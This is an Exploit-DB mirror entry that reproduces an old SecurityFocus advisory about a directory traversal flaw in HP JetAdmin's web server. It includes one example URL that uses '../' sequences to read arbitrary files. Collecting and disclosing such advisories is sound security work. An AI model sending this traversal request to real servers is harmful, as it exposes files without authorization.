exploit-db-mirror/exploits/cgi/remote/19956.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

5 lines
No EOL
331 B
Text

source: https://www.securityfocus.com/bid/1243/info
By default JetAdmin Web Interface Server listens on port 8000. By requesting a specially formed URL which includes "../" it is possible for a remote user to gain read-access to any files outside of the web-published directory.
http://target:8000/cgi/wja?page=/../../../filename